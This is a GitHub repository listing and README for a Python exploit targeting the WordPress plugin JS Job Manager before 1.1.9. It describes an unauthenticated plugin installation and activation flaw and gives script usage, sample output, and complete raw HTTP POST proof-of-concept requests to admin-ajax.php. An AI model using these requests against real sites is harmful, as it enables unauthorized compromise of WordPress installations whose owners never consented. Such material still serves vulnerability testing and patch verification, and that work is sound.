https://github.com/randomrobbiebf/js-jobs
JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation
https://github.com/randomrobbiebf/js-jobs
Last synced: about 1 year ago
JSON representation
JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation
- Host: GitHub
- URL: https://github.com/randomrobbiebf/js-jobs
- Owner: RandomRobbieBF
- License: apache-2.0
- Created: 2023-07-21T08:41:30.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-07-21T08:54:01.000Z (almost 3 years ago)
- Last Synced: 2025-01-21T05:41:44.117Z (over 1 year ago)
- Language: Python
- Size: 7.81 KB
- Stars: 0
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# js-jobs
JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation
# Description
The jsjobs_ajax AJAX action of the plugin available to both authenticated and unauthenticated users does not have proper authorisation and CSRF checks, in particular when using the installPluginFromAjax and activatePluginFromAjax, which could allow unauthenticated attackers to install arbitrary plugins from the WordPress repository, and active them (with some limitation).
There is no control over version of the plugin so you it will install the latest version of the plugin.
How to use
---
```
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s
```
Example
---
```
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.
```
Proof of Concept
---
To install a plugin:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close
action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=
```
To activate a plugin (there is a limitation here, as the plugin must have the /.php file, otherwise it won't be activated):
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=
```